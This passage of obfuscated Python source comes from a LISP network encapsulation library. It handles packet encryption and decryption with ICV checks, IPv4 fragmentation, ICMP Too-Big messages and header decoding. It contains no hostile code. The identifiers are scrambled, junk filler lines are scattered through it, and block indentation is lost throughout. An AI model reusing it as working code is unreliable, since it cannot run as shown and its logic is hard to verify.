lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
else :
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
O0O0O0OO00oo = AES . new ( I11IIIIiI1 , AES . MODE_CBC , iI1ii ) . encrypt
oooo0o0oO = O0O0O0OO00oo ( OO0Oo00OO0oo )
if ( oooo0o0oO == None ) : return ( [ self . packet , False ] )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if ( iIIiI != None ) : oooo0o0oO += iIIiI ( )
self . lisp_header . key_id ( key . key_id )
oOoOO0O00o = self . lisp_header . encode ( )
O00oooO00oo = key . do_icv ( oOoOO0O00o + iI1ii + oooo0o0oO , iI1ii )
III1i1IIII1i = 4 if ( key . do_poly ) else 8
Oo0OOOOOOO0oo = bold ( "Encrypt" , False )
II1Iiiii111i = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
OooooO0o0 = "poly" if key . do_poly else "sha256"
OooooO0o0 = bold ( OooooO0o0 , False )
OOoo00o00O0o0 = "ICV({}): 0x{}...{}" . format ( OooooO0o0 , O00oooO00oo [ 0 : III1i1IIII1i ] , O00oooO00oo [ - III1i1IIII1i : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( Oo0OOOOOOO0oo , key . key_id , addr_str , OOoo00o00O0o0 , II1Iiiii111i , i1 ) )
O00oooO00oo = int ( O00oooO00oo , 16 )
if ( key . do_poly ) :
oo00oO = byte_swap_64 ( ( O00oooO00oo >> 64 ) & LISP_8_64_MASK )
I11i1I11 = byte_swap_64 ( O00oooO00oo & LISP_8_64_MASK )
O00oooO00oo = struct . pack ( "QQ" , oo00oO , I11i1I11 )
else :
oo00oO = byte_swap_64 ( ( O00oooO00oo >> 96 ) & LISP_8_64_MASK )
I11i1I11 = byte_swap_64 ( ( O00oooO00oo >> 32 ) & LISP_8_64_MASK )
I1iIiiI11 = socket . htonl ( O00oooO00oo & 0xffffffff )
O00oooO00oo = struct . pack ( "QQI" , oo00oO , I11i1I11 , I1iIiiI11 )
return ( [ iI1ii + oooo0o0oO + O00oooO00oo , True ] )
def decrypt ( self , packet , header_length , key , addr_str ) :
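  """Check the packet ICV and decrypt the payload. On success returns [plaintext, True]; on ICV or key failure records self.packet_error and returns [None, False]."""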
if ( key . do_poly ) :
oo00oO , I11i1I11 = struct . unpack ( "QQ" , packet [ - 16 : : ] )
oo00o000O = byte_swap_64 ( oo00oO ) << 64
oo00o000O |= byte_swap_64 ( I11i1I11 )
oo00o000O = lisp_hex_string ( oo00o000O ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
III1i1IIII1i = 4
OooO0o = bold ( "poly" , False )
else :
oo00oO , I11i1I11 , I1iIiiI11 = struct . unpack ( "QQI" , packet [ - 20 : : ] )
oo00o000O = byte_swap_64 ( oo00oO ) << 96
oo00o000O |= byte_swap_64 ( I11i1I11 ) << 32
oo00o000O |= socket . htonl ( I1iIiiI11 )
oo00o000O = lisp_hex_string ( oo00o000O ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
III1i1IIII1i = 8
OooO0o = bold ( "sha" , False )
oOoOO0O00o = self . lisp_header . encode ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
i1I = 8
II1Iiiii111i = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
i1I = 12
II1Iiiii111i = bold ( "aes-gcm" , False )
else :
i1I = 16
II1Iiiii111i = bold ( "aes-cbc" , False )
iI1ii = packet [ 0 : i1I ]
o0OoOo0O00 = key . do_icv ( oOoOO0O00o + packet , iI1ii )
I1iII = "0x{}...{}" . format ( oo00o000O [ 0 : III1i1IIII1i ] , oo00o000O [ - III1i1IIII1i : : ] )
I1IIiIi = "0x{}...{}" . format ( o0OoOo0O00 [ 0 : III1i1IIII1i ] , o0OoOo0O00 [ - III1i1IIII1i : : ] )
if ( o0OoOo0O00 != oo00o000O ) :
self . packet_error = "ICV-error"
o0000oO = II1Iiiii111i + "/" + OooO0o
ooo0oo = bold ( "ICV failed ({})" . format ( o0000oO ) , False )
OOoo00o00O0o0 = "packet-ICV {} != computed-ICV {}" . format ( I1iII , I1IIiIi )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( ooo0oo , red ( addr_str , False ) ,
self . udp_sport , key . key_id , OOoo00o00O0o0 ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
lisp_retry_decap_keys ( addr_str , oOoOO0O00o + packet , iI1ii , oo00o000O )
return ( [ None , False ] )
packet = packet [ i1I : : ]
i1 = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
IiI1iIiiI1iI = chacha . ChaCha ( key . encrypt_key , iI1ii ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
try :
IiI1iIiiI1iI = AES . new ( I11IIIIiI1 , AES . MODE_GCM , iI1ii ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
I11IIIIiI1 = binascii . unhexlify ( key . encrypt_key )
IiI1iIiiI1iI = AES . new ( I11IIIIiI1 , AES . MODE_CBC , iI1ii ) . decrypt
II11 = IiI1iIiiI1iI ( packet )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
Oo0OOOOOOO0oo = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
OooooO0o0 = "poly" if key . do_poly else "sha256"
OooooO0o0 = bold ( OooooO0o0 , False )
OOoo00o00O0o0 = "ICV({}): {}" . format ( OooooO0o0 , I1iII )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( Oo0OOOOOOO0oo , key . key_id , addr_str , OOoo00o00O0o0 , II1Iiiii111i , i1 ) )
self . packet = self . packet [ 0 : header_length ]
return ( [ II11 , True ] )
def fragment_outer ( self , outer_hdr , inner_packet ) :
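  """Chop inner_packet into 1000-byte pieces and prepend the supplied outer IPv4 header to each, setting the fragment-offset field and more-fragments bit; returns the list of fragments."""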
Iiiii = 1000
oOo00Oo0o00oo = [ ]
IiI1ii1Ii = 0
iI = len ( inner_packet )
while ( IiI1ii1Ii < iI ) :
oo0O00o0O0Oo = inner_packet [ IiI1ii1Ii : : ]
if ( len ( oo0O00o0O0Oo ) > Iiiii ) : oo0O00o0O0Oo = oo0O00o0O0Oo [ 0 : Iiiii ]
oOo00Oo0o00oo . append ( oo0O00o0O0Oo )
IiI1ii1Ii += len ( oo0O00o0O0Oo )
iIIIi = [ ]
IiI1ii1Ii = 0
for oo0O00o0O0Oo in oOo00Oo0o00oo :
o0I1IiiiiI1i1I = IiI1ii1Ii if ( oo0O00o0O0Oo == oOo00Oo0o00oo [ - 1 ] ) else 0x2000 + IiI1ii1Ii
o0I1IiiiiI1i1I = socket . htons ( o0I1IiiiiI1i1I )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , o0I1IiiiiI1i1I ) + outer_hdr [ 8 : : ]
i1IIiI1iII = socket . htons ( len ( oo0O00o0O0Oo ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , i1IIiI1iII ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
iIIIi . append ( outer_hdr + oo0O00o0O0Oo )
   IiI1ii1Ii += len ( oo0O00o0O0Oo ) // 8 # offset is in 8-byte units; integer divide keeps it an int for htons() under Python 3
return ( iIIIi )
def send_icmp_too_big ( self , inner_packet ) :
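  """Send a rate-limited ICMPv4 Fragmentation-Needed (Too-Big) message advertising MTU 1400 back to the inner source. Returns True when the message was sent."""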
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
Ii1i1 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( Ii1i1 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
return ( False )
OoO = socket . htons ( 1400 )
O0OO0ooO00 = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , OoO )
O0OO0ooO00 += inner_packet [ 0 : 20 + 8 ]
O0OO0ooO00 = lisp_icmp_checksum ( O0OO0ooO00 )
oOooo00OOO000 = inner_packet [ 12 : 16 ]
OooOOooo = self . inner_source . print_address_no_iid ( )
O00oOoo00O = self . outer_source . pack_address ( )
o000o0o00Oo = socket . htons ( 20 + 36 )
o0OO00oo0O = struct . pack ( "BBHHHBBH" , 0x45 , 0 , o000o0o00Oo , 0 , 0 , 32 , 1 , 0 ) + O00oOoo00O + oOooo00OOO000
o0OO00oo0O = lisp_ip_checksum ( o0OO00oo0O )
o0OO00oo0O = self . fix_outer_header ( o0OO00oo0O )
o0OO00oo0O += O0OO0ooO00
IIi1IiiIi1III = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( IIi1IiiIi1III , OooOOooo ,
lisp_format_packet ( o0OO00oo0O ) ) )
try :
lisp_icmp_raw_socket . sendto ( o0OO00oo0O , ( OooOOooo , 0 ) )
except socket . error as I1i :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( I1i ) )
return ( False )
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
def fragment ( self ) :
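  """Return ([fragments], reason) for self.packet. Packets of 1500 bytes or less go out whole; inner IPv6 packets are fragmented at the outer IPv4 header; inner IPv4 packets are fragmented at the inner header, honoring DF by sending an ICMP Too-Big when a raw ICMP socket exists."""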
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
OO0Oo00OO0oo = self . fix_outer_header ( self . packet )
iI = len ( OO0Oo00OO0oo )
if ( iI <= 1500 ) : return ( [ OO0Oo00OO0oo ] , "Fragment-None" )
OO0Oo00OO0oo = self . packet
if ( self . inner_version != 4 ) :
i11I1iiii = random . randint ( 0 , 0xffff )
i1iIi = OO0Oo00OO0oo [ 0 : 4 ] + struct . pack ( "H" , i11I1iiii ) + OO0Oo00OO0oo [ 6 : 20 ]
oOO00OOOoO0o = OO0Oo00OO0oo [ 20 : : ]
iIIIi = self . fragment_outer ( i1iIi , oOO00OOOoO0o )
return ( iIIIi , "Fragment-Outer" )
Ii1o0OOOoo0000 = 56 if ( self . outer_version == 6 ) else 36
i1iIi = OO0Oo00OO0oo [ 0 : Ii1o0OOOoo0000 ]
IiIIii1i1i11iII = OO0Oo00OO0oo [ Ii1o0OOOoo0000 : Ii1o0OOOoo0000 + 20 ]
oOO00OOOoO0o = OO0Oo00OO0oo [ Ii1o0OOOoo0000 + 20 : : ]
i1i = struct . unpack ( "H" , IiIIii1i1i11iII [ 6 : 8 ] ) [ 0 ]
i1i = socket . ntohs ( i1i )
if ( i1i & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
i1iiiI = OO0Oo00OO0oo [ Ii1o0OOOoo0000 : : ]
if ( self . send_icmp_too_big ( i1iiiI ) ) : return ( [ ] , None )
if ( lisp_ignore_df_bit ) :
i1i &= ~ 0x4000
else :
ooi1 = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( ooi1 ) )
return ( [ ] , "Fragment-None-DF-bit" )
IiI1ii1Ii = 0
iI = len ( oOO00OOOoO0o )
iIIIi = [ ]
while ( IiI1ii1Ii < iI ) :
iIIIi . append ( oOO00OOOoO0o [ IiI1ii1Ii : IiI1ii1Ii + 1400 ] )
IiI1ii1Ii += 1400
oOo00Oo0o00oo = iIIIi
iIIIi = [ ]
ooOOo0O0o00o00 = True if i1i & 0x2000 else False
i1i = ( i1i & 0x1fff ) * 8
for oo0O00o0O0Oo in oOo00Oo0o00oo :
o00oooo = old_div ( i1i , 8 )
if ( ooOOo0O0o00o00 ) :
o00oooo |= 0x2000
elif ( oo0O00o0O0Oo != oOo00Oo0o00oo [ - 1 ] ) :
o00oooo |= 0x2000
o00oooo = socket . htons ( o00oooo )
IiIIii1i1i11iII = IiIIii1i1i11iII [ 0 : 6 ] + struct . pack ( "H" , o00oooo ) + IiIIii1i1i11iII [ 8 : : ]
iI = len ( oo0O00o0O0Oo )
i1i += iI
i1IIiI1iII = socket . htons ( iI + 20 )
IiIIii1i1i11iII = IiIIii1i1i11iII [ 0 : 2 ] + struct . pack ( "H" , i1IIiI1iII ) + IiIIii1i1i11iII [ 4 : 10 ] + struct . pack ( "H" , 0 ) + IiIIii1i1i11iII [ 12 : : ]
IiIIii1i1i11iII = lisp_ip_checksum ( IiIIii1i1i11iII )
OO00oOo0o00 = IiIIii1i1i11iII + oo0O00o0O0Oo
iI = len ( OO00oOo0o00 )
if ( self . outer_version == 4 ) :
i1IIiI1iII = iI + Ii1o0OOOoo0000
iI += 16
i1iIi = i1iIi [ 0 : 2 ] + struct . pack ( "H" , i1IIiI1iII ) + i1iIi [ 4 : : ]
i1iIi = lisp_ip_checksum ( i1iIi )
OO00oOo0o00 = i1iIi + OO00oOo0o00
OO00oOo0o00 = self . fix_outer_header ( OO00oOo0o00 )
oo00OOo0 = Ii1o0OOOoo0000 - 12
i1IIiI1iII = socket . htons ( iI )
OO00oOo0o00 = OO00oOo0o00 [ 0 : oo00OOo0 ] + struct . pack ( "H" , i1IIiI1iII ) + OO00oOo0o00 [ oo00OOo0 + 2 : : ]
iIIIi . append ( OO00oOo0o00 )
return ( iIIIi , "Fragment-Inner" )
def fix_outer_header ( self , packet ) :
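  """Byte-swap the outer IPv4 total-length field (and on macOS the fragment-offset field as well) because raw sockets on these platforms expect host byte order in those fields."""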
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 : 4 ] + packet [ 2 : 3 ] + packet [ 4 : 6 ] + packet [ 7 : 8 ] + packet [ 6 : 7 ] + packet [ 8 : : ]
else :
packet = packet [ 0 : 2 ] + packet [ 3 : 4 ] + packet [ 2 : 3 ] + packet [ 4 : : ]
return ( packet )
def send_packet ( self , lisp_raw_socket , dest ) :
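  """Fragment self.packet as needed and transmit each piece to dest through lisp_raw_socket, printing and flow-logging along the way."""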
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 10 - 10: I1IiiI - I1ii11iIi11i - Oo0Ooo - o0oOOo0O0Ooo
dest = dest . print_address_no_iid ( )
iIIIi , ii1IIii = self . fragment ( )
for OO00oOo0o00 in iIIIi :
if ( len ( iIIIi ) != 1 ) :
self . packet = OO00oOo0o00
self . print_packet ( ii1IIii , True )
try : lisp_raw_socket . sendto ( OO00oOo0o00 , ( dest , 0 ) )
except socket . error as I1i :
lprint ( "socket.sendto() failed: {}" . format ( I1i ) )
def send_l2_packet ( self , l2_socket , mac_header ) :
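  """Prepend mac_header to self.packet and write the frame out the layer-2 (tap) socket; drops the packet when either is missing."""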
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
OO0Oo00OO0oo = mac_header + self . packet
l2_socket . write ( OO0Oo00OO0oo )
return
def bridge_l2_packet ( self , eid , db ) :
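  """Bridge a layer-2 frame for a dynamic-EID: look up the interface recorded for eid in database-mapping db and send self.packet on its bridge socket."""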
try : iiI1IiI1I1I = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : i1i1111I = lisp_myinterfaces [ iiI1IiI1I1I . interface ]
except : return
try :
socket = i1i1111I . get_bridge_socket ( )
if ( socket == None ) : return
except : return
try : socket . send ( self . packet )
except socket . error as I1i :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( I1i ) )
def is_lisp_packet ( self , packet ) :
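  """Return True when packet is UDP and its source or destination port is the LISP data port."""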
Ii1iiI1 = ( struct . unpack ( "B" , packet [ 9 : 10 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( Ii1iiI1 == False ) : return ( False )
if 42 - 42: iIii1I11I1II1 * I1IiiI * I1Ii111
O00oo0o0o0oo = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( O00oo0o0o0oo ) == LISP_DATA_PORT ) : return ( True )
O00oo0o0o0oo = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( O00oo0o0o0oo ) == LISP_DATA_PORT ) : return ( True )
return ( False )
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
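  """Decode the outer IP/UDP/LISP headers (when is_lisp_packet) and the inner IPv4/IPv6/MAC header into this object, validating checksums and decrypting when the LISP header K-bits are set. Returns self on success or None on error, counting the error in stats."""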
self . packet_error = ""
OO0Oo00OO0oo = self . packet
OO0 = len ( OO0Oo00OO0oo )
iii111 = o00O000oooOo = True
oO = 0
i1oO00O = self . lisp_header . get_instance_id ( )
if ( is_lisp_packet ) :
I1iI1Ii11 = struct . unpack ( "B" , OO0Oo00OO0oo [ 0 : 1 ] ) [ 0 ]
self . outer_version = I1iI1Ii11 >> 4
if ( self . outer_version == 4 ) :
Ii1Iii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 10 : 12 ] ) [ 0 ]
OO0Oo00OO0oo = lisp_ip_checksum ( OO0Oo00OO0oo )
OOOoOOo0o = struct . unpack ( "H" , OO0Oo00OO0oo [ 10 : 12 ] ) [ 0 ]
if ( OOOoOOo0o != 0 ) :
if ( Ii1Iii1 != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( OO0 )
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
O0ooO0O00oo0 = LISP_AFI_IPV4
IiI1ii1Ii = 12
self . outer_tos = struct . unpack ( "B" , OO0Oo00OO0oo [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 8 : 9 ] ) [ 0 ]
oO = 20
elif ( self . outer_version == 6 ) :
O0ooO0O00oo0 = LISP_AFI_IPV6
IiI1ii1Ii = 8
II1i1iI = struct . unpack ( "H" , OO0Oo00OO0oo [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( II1i1iI ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 7 : 8 ] ) [ 0 ]
oO = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
lprint ( "Cannot decode outer header" )
return ( None )
self . outer_source . afi = O0ooO0O00oo0
self . outer_dest . afi = O0ooO0O00oo0
OOoo = self . outer_source . addr_length ( )
if 40 - 40: I1IiiI
self . outer_source . unpack_address ( OO0Oo00OO0oo [ IiI1ii1Ii : IiI1ii1Ii + OOoo ] )
IiI1ii1Ii += OOoo
self . outer_dest . unpack_address ( OO0Oo00OO0oo [ IiI1ii1Ii : IiI1ii1Ii + OOoo ] )
OO0Oo00OO0oo = OO0Oo00OO0oo [ oO : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( I1I1iIIiii1 )
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( I1I1iIIiii1 )
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( I1I1iIIiii1 )
I1I1iIIiii1 = struct . unpack ( "H" , OO0Oo00OO0oo [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( I1I1iIIiii1 )
OO0Oo00OO0oo = OO0Oo00OO0oo [ 8 : : ]
iii111 = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
o00O000oooOo = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if ( self . lisp_header . decode ( OO0Oo00OO0oo ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
OO0Oo00OO0oo = OO0Oo00OO0oo [ 8 : : ]
i1oO00O = self . lisp_header . get_instance_id ( )
oO += 16
if ( i1oO00O == 0xffffff ) : i1oO00O = 0
ooiIi11i1I11Ii = False
oo0OO0oo = self . lisp_header . k_bits
if ( oo0OO0oo ) :
Oo0o = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( Oo0o == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
self . print_packet ( "Receive" , is_lisp_packet )
iIIIii111 = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( iIIIii111 , oo0OO0oo ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
III11II111 = lisp_crypto_keys_by_rloc_decap [ Oo0o ] [ oo0OO0oo ]
if ( III11II111 == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
self . print_packet ( "Receive" , is_lisp_packet )
iIIIii111 = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( iIIIii111 ,
red ( Oo0o , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
III11II111 . use_count += 1
OO0Oo00OO0oo , ooiIi11i1I11Ii = self . decrypt ( OO0Oo00OO0oo , oO , III11II111 ,
Oo0o )
if ( ooiIi11i1I11Ii == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
I1iI1Ii11 = struct . unpack ( "B" , OO0Oo00OO0oo [ 0 : 1 ] ) [ 0 ]
self . inner_version = I1iI1Ii11 >> 4
if ( iii111 and self . inner_version == 4 and I1iI1Ii11 >= 0x45 ) :
o0oOO00O000O0 = socket . ntohs ( struct . unpack ( "H" , OO0Oo00OO0oo [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , OO0Oo00OO0oo [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , OO0Oo00OO0oo [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( OO0Oo00OO0oo [ 12 : 16 ] )
self . inner_dest . unpack_address ( OO0Oo00OO0oo [ 16 : 20 ] )
i1i = socket . ntohs ( struct . unpack ( "H" , OO0Oo00OO0oo [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( i1i & 0x2000 or i1i != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , OO0Oo00OO0oo [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , OO0Oo00OO0oo [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
elif ( iii111 and self . inner_version == 6 and I1iI1Ii11 >= 0x60 ) :
o0oOO00O000O0 = socket . ntohs ( struct . unpack ( "H" , OO0Oo00OO0oo [ 4 : 6 ] ) [ 0 ] ) + 40
II1i1iI = struct . unpack ( "H" , OO0Oo00OO0oo [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( II1i1iI ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , OO0Oo00OO0oo [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , OO0Oo00OO0oo [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( OO0Oo00OO0oo [ 8 : 24 ] )
self . inner_dest . unpack_address ( OO0Oo00OO0oo [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , OO0Oo00OO0oo [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , OO0Oo00OO0oo [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
elif ( o00O000oooOo ) :
o0oOO00O000O0 = len ( OO0Oo00OO0oo )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( OO0Oo00OO0oo [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( OO0Oo00OO0oo [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( OO0 )
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( I1iI1Ii11 ) ) )
OO0Oo00OO0oo = lisp_format_packet ( OO0Oo00OO0oo [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( OO0Oo00OO0oo ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = i1oO00O
self . inner_dest . instance_id = i1oO00O
if ( lisp_nonce_echoing and is_lisp_packet ) :
oo000O0o = lisp_get_echo_nonce ( self . outer_source , None )
if ( oo000O0o == None ) :
o00oO = self . outer_source . print_address_no_iid ( )
oo000O0o = lisp_echo_nonce ( o00oO )
OOO0O0O = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
oo000O0o . receive_request ( lisp_ipc_socket , OOO0O0O )
elif ( oo000O0o . request_nonce_sent ) :
oo000O0o . receive_echo ( lisp_ipc_socket , OOO0O0O )
if ( ooiIi11i1I11Ii ) : self . packet += OO0Oo00OO0oo [ : o0oOO00O000O0 ]
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
def swap_mac ( self , mac ) :
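  """Swap adjacent bytes of a packed 6-byte MAC address (wire order <-> internal order)."""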
  # Slice one byte at a time so this also works on Python 3 bytes, where indexing yields ints.
  return ( mac [ 1 : 2 ] + mac [ 0 : 1 ] + mac [ 3 : 4 ] + mac [ 2 : 3 ] + mac [ 5 : 6 ] + mac [ 4 : 5 ] )
def strip_outer_headers ( self ) :
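  """Strip the outer IP, UDP, and LISP headers, leaving the inner packet in self.packet."""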
IiI1ii1Ii = 16
IiI1ii1Ii += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ IiI1ii1Ii : : ]
return ( self )
def hash_ports ( self ) :
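  """Fold the inner protocol number and TCP/UDP port pair into a 16-bit value; returns just the protocol for IPv4 fragments and 0 for other protocols."""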
OO0Oo00OO0oo = self . packet
I1iI1Ii11 = self . inner_version
iiIIII11iIii = 0
if ( I1iI1Ii11 == 4 ) :
O0000O = struct . unpack ( "B" , OO0Oo00OO0oo [ 9 : 10 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( O0000O )
if ( O0000O in [ 6 , 17 ] ) :
iiIIII11iIii = O0000O
iiIIII11iIii += struct . unpack ( "I" , OO0Oo00OO0oo [ 20 : 24 ] ) [ 0 ]
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
if ( I1iI1Ii11 == 6 ) :
O0000O = struct . unpack ( "B" , OO0Oo00OO0oo [ 6 : 7 ] ) [ 0 ]
if ( O0000O in [ 6 , 17 ] ) :
iiIIII11iIii = O0000O
iiIIII11iIii += struct . unpack ( "I" , OO0Oo00OO0oo [ 40 : 44 ] ) [ 0 ]
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
return ( iiIIII11iIii )
def hash_packet ( self ) :
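  """Hash the inner addresses and ports into the UDP source port (0xf000 | 12-bit hash), presumably so underlay routers can load-split encapsulated flows."""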
iiIIII11iIii = self . inner_source . address ^ self . inner_dest . address
iiIIII11iIii += self . hash_ports ( )
if ( self . inner_version == 4 ) :
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
elif ( self . inner_version == 6 ) :
iiIIII11iIii = ( iiIIII11iIii >> 64 ) ^ ( iiIIII11iIii & 0xffffffffffffffff )
iiIIII11iIii = ( iiIIII11iIii >> 32 ) ^ ( iiIIII11iIii & 0xffffffff )
iiIIII11iIii = ( iiIIII11iIii >> 16 ) ^ ( iiIIII11iIii & 0xffff )
self . udp_sport = 0xf000 | ( iiIIII11iIii & 0xfff )
def print_packet ( self , s_or_r , is_lisp_packet ) :
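  """Print a one-line debug description of the packet; s_or_r labels the direction ("Send", "Receive", "Replicate", or a fragment reason)."""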
if ( is_lisp_packet == False ) :
iiI = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
